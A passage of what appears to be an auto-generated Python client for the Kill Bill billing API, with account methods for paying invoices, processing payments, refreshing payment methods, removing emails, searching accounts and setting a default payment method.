all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method pay_all_invoices" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `pay_all_invoices`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `pay_all_invoices`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `pay_all_invoices`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'external_payment' in params:
query_params.append(('externalPayment', params['external_payment'])) # noqa: E501
if 'payment_amount' in params:
query_params.append(('paymentAmount', params['payment_amount'])) # noqa: E501
if 'target_date' in params:
query_params.append(('targetDate', params['target_date'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoicePayments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Invoice]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_payment(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentTransaction body: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.process_payment_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.process_payment_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def process_payment_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param PaymentTransaction body: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'payment_method_id', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method process_payment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `process_payment`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `process_payment`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `process_payment`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `process_payment`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/payments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Payment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_payment_by_external_key(self, body=None, external_key=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment using the account external key (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_by_external_key(body, external_key, created_by, async=True)
>>> result = thread.get()
:param async bool
:param PaymentTransaction body: (required)
:param Str external_key: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.process_payment_by_external_key_with_http_info(body, external_key, created_by, **kwargs) # noqa: E501
else:
(data) = self.process_payment_by_external_key_with_http_info(body, external_key, created_by, **kwargs) # noqa: E501
return data
def process_payment_by_external_key_with_http_info(self, body=None, external_key=None, created_by=None, **kwargs): # noqa: E501
"""Trigger a payment using the account external key (authorization, purchase or credit) # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.process_payment_by_external_key_with_http_info(body, external_key, created_by, async=True)
>>> result = thread.get()
:param async bool
:param PaymentTransaction body: (required)
:param Str external_key: (required)
:param Str created_by: (required)
:param Str payment_method_id:
:param List[Str] control_plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: Payment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'external_key', 'created_by', 'payment_method_id', 'control_plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method process_payment_by_external_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `process_payment_by_external_key`") # noqa: E501
# verify the required parameter 'external_key' is set
if ('external_key' not in params or
params['external_key'] is None):
raise ValueError("Missing the required parameter `external_key` when calling `process_payment_by_external_key`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `process_payment_by_external_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'payment_method_id' in params:
query_params.append(('paymentMethodId', params['payment_method_id'])) # noqa: E501
if 'control_plugin_name' in params:
query_params.append(('controlPluginName', params['control_plugin_name'])) # noqa: E501
collection_formats['controlPluginName'] = 'multi' # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/payments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Payment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def rebalance_existing_cba_on_account(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Rebalance account CBA # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.rebalance_existing_cba_on_account(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def rebalance_existing_cba_on_account_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Rebalance account CBA # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.rebalance_existing_cba_on_account_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method rebalance_existing_cba_on_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `rebalance_existing_cba_on_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `rebalance_existing_cba_on_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `rebalance_existing_cba_on_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/cbaRebalancing', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def refresh_payment_methods(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Refresh account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.refresh_payment_methods(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.refresh_payment_methods_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.refresh_payment_methods_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def refresh_payment_methods_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Refresh account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.refresh_payment_methods_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method refresh_payment_methods" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `refresh_payment_methods`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `refresh_payment_methods`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `refresh_payment_methods`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'plugin_name' in params:
query_params.append(('pluginName', params['plugin_name'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods/refresh', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_email(self, account_id=None, email=None, created_by=None, **kwargs): # noqa: E501
"""Delete email from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_email(account_id, email, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str email: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_email_with_http_info(account_id, email, created_by, **kwargs) # noqa: E501
else:
(data) = self.remove_email_with_http_info(account_id, email, created_by, **kwargs) # noqa: E501
return data
def remove_email_with_http_info(self, account_id=None, email=None, created_by=None, **kwargs): # noqa: E501
"""Delete email from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_email_with_http_info(account_id, email, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str email: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'email', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_email" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `remove_email`") # noqa: E501
# verify the required parameter 'email' is set
if ('email' not in params or
params['email'] is None):
raise ValueError("Missing the required parameter `email` when calling `remove_email`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `remove_email`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `remove_email`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'email' in params:
path_params['email'] = params['email'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails/{email}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_accounts(self, search_key=None, **kwargs): # noqa: E501
"""Search accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.search_accounts(search_key, async=True)
>>> result = thread.get()
:param async bool
:param Str search_key: (required)
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.search_accounts_with_http_info(search_key, **kwargs) # noqa: E501
else:
(data) = self.search_accounts_with_http_info(search_key, **kwargs) # noqa: E501
return data
def search_accounts_with_http_info(self, search_key=None, **kwargs): # noqa: E501
"""Search accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.search_accounts_with_http_info(search_key, async=True)
>>> result = thread.get()
:param async bool
:param Str search_key: (required)
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search_key', 'offset', 'limit', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'search_key' is set
if ('search_key' not in params or
params['search_key'] is None):
raise ValueError("Missing the required parameter `search_key` when calling `search_accounts`") # noqa: E501
if 'search_key' in params and not re.search('.*', params['search_key']): # noqa: E501
raise ValueError("Invalid value for parameter `search_key` when calling `search_accounts`, must conform to the pattern `/.*/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'search_key' in params:
path_params['searchKey'] = params['search_key'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/search/{searchKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_default_payment_method(self, account_id=None, payment_method_id=None, created_by=None, **kwargs): # noqa: E501
"""Set the default payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.set_default_payment_method(account_id, payment_method_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str payment_method_id: (required)
:param Str created_by: (required)
:param Bool pay_all_unpaid_invoices:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, **kwargs) # noqa: E501
return data
def set_default_payment_method_with_http_info(self, account_id=None, payment_method_id=None, created_by=None, **kwargs): # noqa: E501
"""Set the default payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str payment_method_id: (required)
:param Str created_by: (required)
:param Bool pay_all_unpaid_invoices:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'payment_method_id', 'created_by', 'pay_all_unpaid_invoices', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_default_payment_method" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `set_default_payment_method`") # noqa: E501
# verify the required parameter 'payment_method_id' is set
if ('payment_method_id' not in params or
params['payment_method_id'] is None):
raise ValueError("Missing the required parameter `payment_method_id` when calling `set_default_payment_method`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `set_default_payment_method`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `set_default_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
if 'payment_method_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['payment_method_id']): # noqa: E501
raise ValueError("Invalid value for parameter `payment_method_id` when calling `set_default_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'payment_method_id' in params:
path_params['paymentMethodId'] = params['payment_method_id'] # noqa: E501
query_params = []
if 'pay_all_unpaid_invoices' in params:
query_params.append(('payAllUnpaidInvoices', params['pay_all_unpaid_invoices'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods/{paymentMethodId}/setDefault', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def transfer_child_credit_to_parent(self, child_account_id=None, created_by=None, **kwargs): # noqa: E501
"""Move a given child credit to the parent level # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.transfer_child_credit_to_parent(child_account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str child_account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, **kwargs) # noqa: E501
return data
def transfer_child_credit_to_parent_with_http_info(self, child_account_id=None, created_by=None, **kwargs): # noqa: E501
"""Move a given child credit to the parent level # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str child_account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['child_account_id', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
